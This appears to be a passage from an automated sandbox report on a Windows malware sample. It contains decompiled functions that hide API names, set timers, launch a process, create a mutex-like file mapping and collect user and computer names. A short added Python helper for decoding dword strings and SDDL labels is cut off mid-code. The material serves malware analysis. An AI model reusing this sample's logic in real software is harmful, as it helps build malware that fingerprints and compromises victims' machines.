                                                            0x00dd6dc2
                                                            0x00dd6dc2
                                                            0x00dd6db9
                                                            0x00dd6db9
                                                            0x00dd6dc0
                                                            0x00000000
                                                            0x00000000
                                                            0x00dd6dc0
                                                            0x00dd6dcc
                                                            0x00000000
                                                            0x00dd6dcf
                                                            0x00dd6dd3
                                                            0x00dd6dde
                                                            0x00dd6dde
                                                            0x00dd6de5
                                                            0x00dd6dea
                                                            0x00dd6df1
                                                            0x00dd6dfa
                                                            0x00dd6e00
                                                            0x00dd6e03
                                                            0x00dd6e0a
                                                            0x00dd6e0d
                                                            0x00000000
                                                            0x00000000
                                                            0x00dd6e0f
                                                            0x00dd6e12
                                                            0x00dd6e15
                                                            0x00dd6e18
                                                            0x00000000
                                                            0x00dd6e1a
                                                            0x00dd6e24
                                                            0x00dd6e29
                                                            0x00dd6e29
                                                            0x00000000
                                                            0x00dd6e57
                                                            0x00dd6e57
                                                            0x00dd6e5c
                                                            0x00dd6e7b
                                                            0x00dd6e7d
                                                            0x00dd6e82
                                                            0x00dd6e83
                                                            0x00000000
                                                            0x00dd6e5e
                                                            0x00dd6e5e
                                                            0x00dd6e64
                                                            0x00000000
                                                            0x00dd6e66
                                                            0x00dd6e66
                                                            0x00dd6e6b
                                                            0x00dd6e6d
                                                            0x00dd6e72
                                                            0x00dd6e73
                                                            0x00dd6e89
                                                            0x00dd6e89
                                                            0x00dd6e91
                                                            0x00dd6e9c
                                                            0x00dd6e9f
                                                            0x00dd6eaa
                                                            0x00dd6eac
                                                            0x00dd6eae
                                                            0x00dd6eb1
                                                            0x00000000
                                                            0x00dd6eb7
                                                            0x00000000
                                                            0x00dd6eb7
                                                            0x00dd6eb1
                                                            0x00dd6e64
                                                            0x00000000
                                                            0x00dd6e5c
                                                            0x00dd6e2c
                                                            0x00dd6e2e
                                                            0x00dd6e31
                                                            0x00dd6e32
                                                            0x00dd6e32
                                                            0x00dd6e36
                                                            0x00dd6e40
                                                            0x00dd6e40
                                                            0x00dd6e46
                                                            0x00dd6e49
                                                            0x00dd6e49
                                                            0x00dd6e4f
                                                            0x00dd6e4f
                                                            0x00dd6ecc
                                                            0x00000000

                                                            APIs
                                                            • memset.NTDLL ref: 00DD6D45
                                                            • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 00DD6D51
                                                            • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 00DD6D76
                                                            • SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000), ref: 00DD6D92
                                                            • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00DD6DAB
                                                            • RtlFreeHeap.NTDLL(00000000,00000000), ref: 00DD6E40
                                                            • CloseHandle.KERNEL32(?), ref: 00DD6E4F
                                                            • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 00DD6E89
                                                            • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,00DD5FE7), ref: 00DD6E9F
                                                            • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00DD6EAA
                                                              • Part of subcall function 00DD14C4: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,039C9318,00000000,?,73BCF710,00000000,73BCF730), ref: 00DD1513
                                                              • Part of subcall function 00DD14C4: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,039C9350,?,00000000,30314549,00000014,004F0053,039C930C), ref: 00DD15B0
                                                              • Part of subcall function 00DD14C4: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,00DD6DBE), ref: 00DD15C2
                                                            • GetLastError.KERNEL32 ref: 00DD6EBC
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1178377848.0000000000DD1000.00000020.00020000.sdmp, Offset: 00DD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1178353888.0000000000DD0000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178492117.0000000000DD9000.00000002.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178536827.0000000000DDA000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178636069.0000000000DDC000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
                                                            • String ID:
                                                            • API String ID: 3521023985-0
                                                            • Opcode ID: c0a78d320ca634c053a210965ae8722ffa25a73d2144843217317914701106e1
                                                            • Instruction ID: e34aae76eab0faf22758e9beb2e837d830d1d37fb9b22a5f2918c5b40ec920e8
                                                            • Opcode Fuzzy Hash: c0a78d320ca634c053a210965ae8722ffa25a73d2144843217317914701106e1
                                                            • Instruction Fuzzy Hash: E4513575906228AECF119F95EC44DEEBFB9EF09760F248217F414E2290D7719A40CBB1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • lstrlen.KERNEL32(?,?,00000000,?,04578E6F,00000000,00000001,?,00000000,00000000,00000000,0458B928,00000001), ref: 045625C4
                                                            • VirtualProtect.KERNELBASE(00000000,00000000,00000040,00000200,?,00000000,?,04578E6F,00000000,00000001,?,00000000,00000000,00000000,0458B928,00000001), ref: 045625D6
                                                            • lstrcpy.KERNEL32(00000000,?), ref: 045625E5
                                                            • VirtualProtect.KERNELBASE(00000000,00000000,00000200,00000200,?,00000000,?,04578E6F,00000000,00000001,?,00000000,00000000,00000000,0458B928,00000001), ref: 045625F6
                                                            • VirtualProtect.KERNELBASE(?,00000005,00000040,00000400,045884F0,00000018,0456A14E,?,00000000,?,04578E6F,00000000,00000001,?,00000000,00000000), ref: 0456262C
                                                            • VirtualProtect.KERNELBASE(?,00000004,?,?,?,00000000,?,04578E6F,00000000,00000001,?,00000000,00000000,00000000,0458B928,00000001), ref: 04562647
                                                            • VirtualProtect.KERNEL32(?,00000004,00000040,?,045884F0,00000018,0456A14E,?,00000000,?,04578E6F,00000000,00000001,?,00000000,00000000), ref: 0456265C
                                                            • VirtualProtect.KERNELBASE(?,00000004,00000040,?,045884F0,00000018,0456A14E,?,00000000,?,04578E6F,00000000,00000001,?,00000000,00000000), ref: 04562689
                                                            • VirtualProtect.KERNELBASE(?,00000004,?,?,?,00000000,?,04578E6F,00000000,00000001,?,00000000,00000000,00000000,0458B928,00000001), ref: 045626A3
                                                            • GetLastError.KERNEL32(?,00000000,?,04578E6F,00000000,00000001,?,00000000,00000000,00000000,0458B928,00000001), ref: 045626AA
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: ProtectVirtual$ErrorLastlstrcpylstrlen
                                                            • String ID:
                                                            • API String ID: 3676034644-0
                                                            • Opcode ID: 58edd9677edac7b953cde57706af04910106bb8fb4e069304025af4f63e7d3e1
                                                            • Instruction ID: 988a2264ce3ab14ec41d869248d86b0a4228ffe0d2446f55a40140b79cf08778
                                                            • Opcode Fuzzy Hash: 58edd9677edac7b953cde57706af04910106bb8fb4e069304025af4f63e7d3e1
                                                            • Instruction Fuzzy Hash: 64412F71900709AFDB31AFA5DC44EAAB7B5FB08350F008659E657A75A0EB34F805EF20
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 61%
                                                            			E00DD4BD9(void* __eax, void* __ecx) {
                                                            				long _v8;
                                                            				void* _v12;
                                                            				void* _v16;
                                                            				void* _v28;
                                                            				long _v32;
                                                            				void _v104;
                                                            				char _v108;
                                                            				long _t39;
                                                            				intOrPtr _t43;
                                                            				intOrPtr _t50;
                                                            				void* _t52;
                                                            				intOrPtr _t53;
                                                            				void* _t61;
                                                            				intOrPtr* _t66;
                                                            				intOrPtr* _t73;
                                                            				intOrPtr* _t76;
                                                            
                                                            				_t1 = __eax + 0x14; // 0x74183966
                                                            				_t71 =  *_t1;
                                                            				_t39 = E00DD2039(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16); // executed
                                                            				_v8 = _t39;
                                                            				if(_t39 != 0) {
                                                            					L12:
                                                            					return _v8;
                                                            				}
                                                            				E00DD7801( *((intOrPtr*)(_t71 + 0xc)),  *((intOrPtr*)(_t71 + 8)), _v12);
                                                            				_t43 = _v12(_v12);
                                                            				_v8 = _t43;
                                                            				if(_t43 == 0 && ( *0xdda2b8 & 0x00000001) != 0) {
                                                            					_v32 = 0;
                                                            					asm("stosd");
                                                            					asm("stosd");
                                                            					asm("stosd");
                                                            					_v108 = 0;
                                                            					memset( &_v104, 0, 0x40);
                                                            					_t50 =  *0xdda2d4; // 0x2bed5a8
                                                            					_t18 = _t50 + 0xddb55b; // 0x73797325
                                                            					_t52 = E00DD6ECF(_t18);
                                                            					_v12 = _t52;
                                                            					if(_t52 == 0) {
                                                            						_v8 = 8;
                                                            					} else {
                                                            						_t53 =  *0xdda2d4; // 0x2bed5a8
                                                            						_t20 = _t53 + 0xddb73d; // 0x39c8ce5
                                                            						_t21 = _t53 + 0xddb0af; // 0x4e52454b
                                                            						_t66 = GetProcAddress(GetModuleHandleA(_t21), _t20);
                                                            						if(_t66 == 0) {
                                                            							_v8 = 0x7f;
                                                            						} else {
                                                            							_t73 = __imp__;
                                                            							_v108 = 0x44;
                                                            							 *_t73(0);
                                                            							_t61 =  *_t66(0, _v12, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32); // executed
                                                            							 *_t73(1);
                                                            							if(_t61 == 0) {
                                                            								_v8 = GetLastError();
                                                            							} else {
                                                            								CloseHandle(_v28);
                                                            								CloseHandle(_v32);
                                                            							}
                                                            						}
                                                            						HeapFree( *0xdda290, 0, _v12);
                                                            					}
                                                            				}
                                                            				_t76 = _v16;
                                                            				 *((intOrPtr*)(_t76 + 0x18))( *((intOrPtr*)(_t76 + 0x1c))( *_t76));
                                                            				E00DD77EC(_t76);
                                                            				goto L12;
                                                            			}
                                                            0x00dd4be2
                                                            0x00dd4be2
                                                            0x00dd4bf0
                                                            0x00dd4bf9
                                                            0x00dd4bfc
                                                            0x00dd4d0e
                                                            0x00dd4d15
                                                            0x00dd4d15
                                                            0x00dd4c0b
                                                            0x00dd4c13
                                                            0x00dd4c18
                                                            0x00dd4c1b
                                                            0x00dd4c30
                                                            0x00dd4c36
                                                            0x00dd4c37
                                                            0x00dd4c3a
                                                            0x00dd4c40
                                                            0x00dd4c43
                                                            0x00dd4c48
                                                            0x00dd4c50
                                                            0x00dd4c57
                                                            0x00dd4c5e
                                                            0x00dd4c61
                                                            0x00dd4cf5
                                                            0x00dd4c67
                                                            0x00dd4c67
                                                            0x00dd4c6c
                                                            0x00dd4c73
                                                            0x00dd4c87
                                                            0x00dd4c8b
                                                            0x00dd4cdc
                                                            0x00dd4c8d
                                                            0x00dd4c8d
                                                            0x00dd4c94
                                                            0x00dd4c9b
                                                            0x00dd4cb3
                                                            0x00dd4cb9
                                                            0x00dd4cbd
                                                            0x00dd4cd7
                                                            0x00dd4cbf
                                                            0x00dd4cc8
                                                            0x00dd4ccd
                                                            0x00dd4ccd
                                                            0x00dd4cbd
                                                            0x00dd4ced
                                                            0x00dd4ced
                                                            0x00dd4c61
                                                            0x00dd4cfc
                                                            0x00dd4d05
                                                            0x00dd4d09
                                                            0x00000000

                                                            APIs
                                                              • Part of subcall function 00DD2039: GetModuleHandleA.KERNEL32(4C44544E,00000020,74183966,00000000,00000000,?,?,?,00DD4BF5,?,?,?,?,00000000,00000000), ref: 00DD205E
                                                              • Part of subcall function 00DD2039: GetProcAddress.KERNEL32(00000000,7243775A), ref: 00DD2080
                                                              • Part of subcall function 00DD2039: GetProcAddress.KERNEL32(00000000,614D775A), ref: 00DD2096
                                                              • Part of subcall function 00DD2039: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 00DD20AC
                                                              • Part of subcall function 00DD2039: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 00DD20C2
                                                              • Part of subcall function 00DD2039: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 00DD20D8
                                                            • memset.NTDLL ref: 00DD4C43
                                                              • Part of subcall function 00DD6ECF: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00DD4C5C,73797325), ref: 00DD6EE0
                                                              • Part of subcall function 00DD6ECF: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 00DD6EFA
                                                            • GetModuleHandleA.KERNEL32(4E52454B,039C8CE5,73797325), ref: 00DD4C7A
                                                            • GetProcAddress.KERNEL32(00000000), ref: 00DD4C81
                                                            • Wow64EnableWow64FsRedirection.KERNEL32(00000000), ref: 00DD4C9B
                                                            • Wow64EnableWow64FsRedirection.KERNEL32(00000001), ref: 00DD4CB9
                                                            • CloseHandle.KERNEL32(00000000), ref: 00DD4CC8
                                                            • CloseHandle.KERNEL32(?), ref: 00DD4CCD
                                                            • GetLastError.KERNEL32 ref: 00DD4CD1
                                                            • HeapFree.KERNEL32(00000000,?), ref: 00DD4CED
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1178377848.0000000000DD1000.00000020.00020000.sdmp, Offset: 00DD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1178353888.0000000000DD0000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178492117.0000000000DD9000.00000002.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178536827.0000000000DDA000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178636069.0000000000DDC000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: AddressProc$HandleWow64$CloseEnableEnvironmentExpandModuleRedirectionStrings$ErrorFreeHeapLastmemset
                                                            • String ID:
                                                            • API String ID: 91923200-0
                                                            • Opcode ID: 049df9efdbbb170ab9b728a1835e63c0f3c9dd3883348bf3eff9ab39c116bb21
                                                            • Instruction ID: de26de67a1ca6b132cba8c0e4e38c2a4b40c9b963e8c5b494a68cf634f82c810
                                                            • Opcode Fuzzy Hash: 049df9efdbbb170ab9b728a1835e63c0f3c9dd3883348bf3eff9ab39c116bb21
                                                            • Instruction Fuzzy Hash: F8311875902219FFCB11AFE9DC489AEBFB9EF08350F104452E505E3221D775AA45DBB0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 74%
                                                            			E00DD4E2A(intOrPtr __edx, void** _a4, void** _a8) {
                                                            				intOrPtr _v8;
                                                            				struct _FILETIME* _v12;
                                                            				short _v56;
                                                            				struct _FILETIME* _t12;
                                                            				intOrPtr _t13;
                                                            				void* _t17;
                                                            				void* _t21;
                                                            				intOrPtr _t27;
                                                            				long _t28;
                                                            				void* _t30;
                                                            
                                                            				_t27 = __edx;
                                                            				_t12 =  &_v12;
                                                            				GetSystemTimeAsFileTime(_t12);
                                                            				_push(0x192);
                                                            				_push(0x54d38000);
                                                            				_push(_v8);
                                                            				_push(_v12);
                                                            				L00DD7DD6();
                                                            				_push(_t12);
                                                            				_v12 = _t12;
                                                            				_t13 =  *0xdda2d4; // 0x2bed5a8
                                                            				_t5 = _t13 + 0xddb84d; // 0x39c8df5
                                                            				_t6 = _t13 + 0xddb580; // 0x530025
                                                            				_push(0x16);
                                                            				_push( &_v56);
                                                            				_v8 = _t27;
                                                            				L00DD7ABA();
                                                            				_t17 = CreateFileMappingW(0xffffffff, 0xdda2f8, 4, 0, 0x1000,  &_v56); // executed
                                                            				_t30 = _t17;
                                                            				if(_t30 == 0) {
                                                            					_t28 = GetLastError();
                                                            				} else {
                                                            					if(GetLastError() == 0xb7) {
                                                            						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
                                                            						if(_t21 == 0) {
                                                            							_t28 = GetLastError();
                                                            							if(_t28 != 0) {
                                                            								goto L6;
                                                            							}
                                                            						} else {
                                                            							 *_a4 = _t30;
                                                            							 *_a8 = _t21;
                                                            							_t28 = 0;
                                                            						}
                                                            					} else {
                                                            						_t28 = 2;
                                                            						L6:
                                                            						CloseHandle(_t30);
                                                            					}
                                                            				}
                                                            				return _t28;
                                                            			}

                                                            APIs
                                                            • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,00DD5E63,?,00000001,?), ref: 00DD4E36
                                                            • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 00DD4E4C
                                                            • _snwprintf.NTDLL ref: 00DD4E71
                                                            • CreateFileMappingW.KERNELBASE(000000FF,00DDA2F8,00000004,00000000,00001000,?), ref: 00DD4E8D
                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00DD5E63,?), ref: 00DD4E9F
                                                            • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 00DD4EB6
                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00DD5E63), ref: 00DD4ED7
                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00DD5E63,?), ref: 00DD4EDF
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1178377848.0000000000DD1000.00000020.00020000.sdmp, Offset: 00DD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1178353888.0000000000DD0000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178492117.0000000000DD9000.00000002.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178536827.0000000000DDA000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178636069.0000000000DDC000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                                            • String ID:
                                                            • API String ID: 1814172918-0
                                                            • Opcode ID: 94ea0f29f8880bf8290d1518c0d63749a3b68237ad0c295956d9850e85496077
                                                            • Instruction ID: 6a1a5c20590dd16e34af6759b02c75196aba06d1738bc94788edf3b072479e6e
                                                            • Opcode Fuzzy Hash: 94ea0f29f8880bf8290d1518c0d63749a3b68237ad0c295956d9850e85496077
                                                            • Instruction Fuzzy Hash: 8D21AE76641218FBCB21EB68EC05FAEB7A9AB44750F244123F905E63D0E77199008B70
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetUserNameW.ADVAPI32(00000000,04569A91), ref: 045637B9
                                                            • RtlAllocateHeap.NTDLL(00000000,04569A91), ref: 045637D0
                                                            • GetUserNameW.ADVAPI32(00000000,04569A91), ref: 045637DD
                                                            • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,04569A91,?,?,?,00000000,045681F8), ref: 04563803
                                                            • GetComputerNameW.KERNEL32(00000000,00000000), ref: 0456382A
                                                            • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 0456383E
                                                            • GetComputerNameW.KERNEL32(00000000,00000000), ref: 0456384B
                                                            • HeapFree.KERNEL32(00000000,00000000), ref: 0456386E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: HeapName$AllocateComputerFreeUser
                                                            • String ID:
                                                            • API String ID: 3239747167-0
                                                            • Opcode ID: 36a2d8ba6709b23ead8c0c95234d1545a9f76cf818bc61b3126dd2a45a88eea4
                                                            • Instruction ID: 883b7658dd1f60f784a312a71acfd2cb0fe58fb862fefac935b10b21409201b6
                                                            • Opcode Fuzzy Hash: 36a2d8ba6709b23ead8c0c95234d1545a9f76cf818bc61b3126dd2a45a88eea4
                                                            • Instruction Fuzzy Hash: 8E310C75A00205EFE711DFA9DD80AAEB7F9FB44310F518469E905E3251DB34EE44AB50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 64%
                                                            			E00DD5DCD(signed int __edx) {
                                                            				signed int _v8;
                                                            				long _v12;
                                                            				signed int _v16;
                                                            				long _v20;
                                                            				void* _v24;
                                                            				intOrPtr _v28;
                                                            				intOrPtr _v32;
                                                            				intOrPtr _v36;
                                                            				char _v40;
                                                            				void* __edi;
                                                            				void* __esi;
                                                            				void* _t27;
                                                            				long _t28;
                                                            				long _t31;
                                                            				intOrPtr _t32;
                                                            				void* _t36;
                                                            				signed int _t37;
                                                            				intOrPtr _t38;
                                                            				void* _t39;
                                                            				CHAR* _t42;
                                                            				long _t48;
                                                            				long _t49;
                                                            				void* _t54;
                                                            				void* _t56;
                                                            				intOrPtr _t64;
                                                            				void* _t67;
                                                            				long _t71;
                                                            				void* _t72;
                                                            				signed char _t74;
                                                            				intOrPtr _t76;
                                                            				signed int _t77;
                                                            				long _t82;
                                                            				long _t84;
                                                            				CHAR* _t87;
                                                            				void* _t88;
                                                            
                                                            				_t79 = __edx;
                                                            				_v16 = 0;
                                                            				_v8 = 0;
                                                            				_v12 = 0;
                                                            				_t27 = E00DD6296();
                                                            				if(_t27 != 0) {
                                                            					_t77 =  *0xdda2b4; // 0x2000000a
                                                            					_t73 = (_t77 & 0xf0000000) + _t27;
                                                            					 *0xdda2b4 = (_t77 & 0xf0000000) + _t27;
                                                            				}
                                                            				_t28 =  *0xdda148(0, 2); // executed
                                                            				_v20 = _t28;
                                                            				if(_t28 == 0 || _t28 == 1 || _t28 == 0x80010106) {
                                                            					_t31 = E00DD3822( &_v8,  &_v16); // executed
                                                            					_push(0);
                                                            					_t84 = _t31;
                                                            					_t32 =  *0xdda2d4; // 0x2bed5a8
                                                            					_push(0xdda2fc);
                                                            					_push(1);
                                                            					_t7 = _t32 + 0xddb5bc; // 0x4d283a53
                                                            					 *0xdda2f8 = 0xc;
                                                            					 *0xdda300 = 0;
                                                            					L00DD1D3B();
                                                            					_t36 = E00DD4E2A(_t79,  &_v24,  &_v12); // executed
                                                            					if(_t36 == 0) {
                                                            						CloseHandle(_v24);
                                                            					}
                                                            					if(_t84 != 5) {
                                                            						_t37 = _v16;
                                                            						__eflags = _t37;
                                                            						if(_t37 != 0) {
                                                            							E00DD2E33(_t37 ^ 0xe8fa7dd7,  &_v40);
                                                            							_t87 = E00DD77D7(0x27);
                                                            							__eflags = _t87;
                                                            							if(_t87 != 0) {
                                                            								asm("bswap eax");
                                                            								asm("bswap eax");
                                                            								asm("bswap eax");
                                                            								asm("bswap eax");
                                                            								_t64 =  *0xdda2d4; // 0x2bed5a8
                                                            								_t18 = _t64 + 0xddb86f; // 0x78383025
                                                            								wsprintfA(_t87, _t18, _v40, _v36, _v32, _v28);
                                                            								_t88 = _t88 + 0x18;
                                                            							}
                                                            							 *0xdda32c = _t87;
                                                            						}
                                                            						_t38 = E00DD13AB();
                                                            						 *0xdda2c8 =  *0xdda2c8 ^ 0xe8fa7dd7;
                                                            						 *0xdda31c = _t38;
                                                            						_t39 = E00DD77D7(0x60);
                                                            						__eflags = _t39;
                                                            						 *0xdda37c = _t39;
                                                            						if(_t39 == 0) {
                                                            							_t84 = 8;
                                                            						} else {
                                                            							memset(_t39, 0, 0x60);
                                                            							_t54 =  *0xdda37c; // 0x39c9630
                                                            							_t88 = _t88 + 0xc;
                                                            							__imp__(_t54 + 0x40);
                                                            							_t56 =  *0xdda37c; // 0x39c9630
                                                            							 *_t56 = 0xddb85e;
                                                            							_t84 = 0;
                                                            						}
                                                            						__eflags = _t84;
                                                            						if(_t84 == 0) {
                                                            							_t42 = RtlAllocateHeap( *0xdda290, _t84, 0x52);
                                                            							__eflags = _t42;
                                                            							 *0xdda314 = _t42;
                                                            							if(_t42 == 0) {
                                                            								_t84 = 8;
                                                            							} else {
                                                            								_t74 =  *0xdda2b4; // 0x2000000a
                                                            								_t79 = _t74 & 0x000000ff;
                                                            								_t76 =  *0xdda2d4; // 0x2bed5a8
                                                            								_t19 = _t76 + 0xddb212; // 0x697a6f4d
                                                            								_t73 = _t19;
                                                            								wsprintfA(_t42, _t19, _t74 & 0x000000ff, _t74 & 0x000000ff, 0xdd92a7);
                                                            							}
                                                            							__eflags = _t84;
                                                            							if(_t84 == 0) {
                                                            								asm("sbb eax, eax");
                                                            								E00DD2E33( ~_v8 &  *0xdda2c8, 0xdda00c); // executed
                                                            								_t84 = E00DD2654(_t73);
                                                            								__eflags = _t84;
                                                            								if(_t84 != 0) {
                                                            									goto L31;
                                                            								}
                                                            								_t48 = E00DD28C0();
                                                            								__eflags = _t48;
                                                            								if(_t48 != 0) {
                                                            									__eflags = _v8;
                                                            									_t82 = _v12;
                                                            									if(_v8 != 0) {
                                                            										L30:
                                                            										_t49 = E00DD6D30(_t79, _t82, _v8); // executed
                                                            										_t84 = _t49;
                                                            										goto L31;
                                                            									}
                                                            									__eflags = _t82;
                                                            									if(__eflags == 0) {
                                                            										goto L31;
                                                            									}
                                                            									_t23 = _t82 + 4; // 0x5
                                                            									_t84 = E00DD1D8C(__eflags, _t23);
                                                            									__eflags = _t84;
                                                            									if(_t84 == 0) {
                                                            										goto L31;
                                                            									}
                                                            									goto L30;
                                                            								}
                                                            								_t84 = 8;
                                                            							}
                                                            						}
                                                            					} else {
                                                            						_t71 = _v12;
                                                            						if(_t71 == 0) {
                                                            							L31:
                                                            							if(_v20 == 0 || _v20 == 1) {
                                                            								 *0xdda14c(); // executed
                                                            							}
                                                            							goto L35;
                                                            						}
                                                            						_t72 = _t71 + 4;
                                                            						do {
                                                            							_push(1);
                                                            							_push(_t72);
                                                            							_t67 = 5;
                                                            						} while (E00DD1697(_t67, 0) == 0x4c7);
                                                            					}
                                                            					goto L31;
                                                            				} else {
                                                            					_t84 = _t28;
                                                            					L35:
                                                            					return _t84;
                                                            				}
			}

Per-instruction address column for the function at 0x00DD5DCD omitted here; the addresses listed run from 0x00dd5dcd to 0x00dd6005.

                                                            APIs
                                                              • Part of subcall function 00DD6296: GetModuleHandleA.KERNEL32(4C44544E,00000000,00DD5DE6,00000000,00000000,00000000,?,?,?,?,?,00DD66FE,?,00000001), ref: 00DD62A5
                                                            • ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(4D283A53,00000001,00DDA2FC,00000000), ref: 00DD5E51
                                                            • CloseHandle.KERNEL32(?,?,00000001,?,?,?,?,?,?,?,00DD66FE,?,00000001), ref: 00DD5E6A
                                                            • wsprintfA.USER32 ref: 00DD5EEA
                                                            • memset.NTDLL ref: 00DD5F1A
                                                            • RtlInitializeCriticalSection.NTDLL(039C95F0), ref: 00DD5F2B
                                                            • RtlAllocateHeap.NTDLL(00000008,00000052,00000060), ref: 00DD5F54
                                                            • wsprintfA.USER32 ref: 00DD5F84
                                                              • Part of subcall function 00DD2E33: GetUserNameW.ADVAPI32(00000000,00DD5FA9), ref: 00DD2E6A
                                                              • Part of subcall function 00DD2E33: RtlAllocateHeap.NTDLL(00000000,00DD5FA9), ref: 00DD2E81
                                                              • Part of subcall function 00DD2E33: GetUserNameW.ADVAPI32(00000000,00DD5FA9), ref: 00DD2E8E
                                                              • Part of subcall function 00DD2E33: HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,00DD5FA9,?,?,?,?,?,00DD66FE,?,00000001), ref: 00DD2EAF
                                                              • Part of subcall function 00DD2E33: GetComputerNameW.KERNEL32(00000000,00000000), ref: 00DD2ED6
                                                              • Part of subcall function 00DD2E33: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 00DD2EEA
                                                              • Part of subcall function 00DD2E33: GetComputerNameW.KERNEL32(00000000,00000000), ref: 00DD2EF7
                                                              • Part of subcall function 00DD2E33: HeapFree.KERNEL32(00000000,00000000), ref: 00DD2F15
                                                              • Part of subcall function 00DD77D7: RtlAllocateHeap.NTDLL(00000000,00000000,00DD1275), ref: 00DD77E3
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1178377848.0000000000DD1000.00000020.00020000.sdmp, Offset: 00DD0000, based on PE: true
• Associated: 00000000.00000002.1178353888.0000000000DD0000.00000004.00020000.sdmp
• Associated: 00000000.00000002.1178492117.0000000000DD9000.00000002.00020000.sdmp
• Associated: 00000000.00000002.1178536827.0000000000DDA000.00000004.00020000.sdmp
• Associated: 00000000.00000002.1178636069.0000000000DDC000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: Heap$AllocateName$ComputerDescriptorFreeHandleSecurityUserwsprintf$CloseConvertCriticalInitializeModuleSectionStringmemset
                                                            • String ID:
                                                            • API String ID: 2910951584-0
                                                            • Opcode ID: b66ed8306f14f44776140f208b677f2a006004aba055808ef4c25d3d9716c108
                                                            • Instruction ID: b05a0c38704bb7da30d618c3ed2e96117cbb1f710239d0d4d67fe9c58ed3b6b0
                                                            • Opcode Fuzzy Hash: b66ed8306f14f44776140f208b677f2a006004aba055808ef4c25d3d9716c108
                                                            • Instruction Fuzzy Hash: D751DC71901615ABDB20EBA9EC85EAEB7B8EB04700F188013F804EB394D775DE048BB1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%
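
Two of the argument values in the API list for this function are the first four bytes of string arguments read as a little-endian dword: 4C44544E is "NTDL" (the GetModuleHandleA argument, i.e. ntdll) and 4D283A53 is "S:(M", the start of the SDDL string passed to ConvertStringSecurityDescriptorToSecurityDescriptorA, whose SACL begins with a mandatory-label ("ML") entry; the rest of that string is not shown in the report. The Python below is an added example, not code from the report or from the sample: it decodes such dword-as-ASCII values and parses the mandatory-label ACEs out of an SDDL string. The SDDL strings it is run on are constructed for illustration (S:(ML;;NW;;;LW) is the usual low-integrity, no-write-up label), not the sample's actual string, and all function names are the example's own.

```python
import re
import struct

# Joe Sandbox prints a pointer argument as the first dword at the pointed-to address;
# for string arguments that dword, read little-endian, spells the first four characters.
def dword_to_ascii(value: int) -> str:
    """Decode a 32-bit little-endian dword as four ASCII characters (non-ASCII -> U+FFFD)."""
    return struct.pack("<I", value).decode("ascii", errors="replace")

# SDDL abbreviations for mandatory-label SIDs and rights (Windows sddl.h).
MANDATORY_LABEL_SIDS = {
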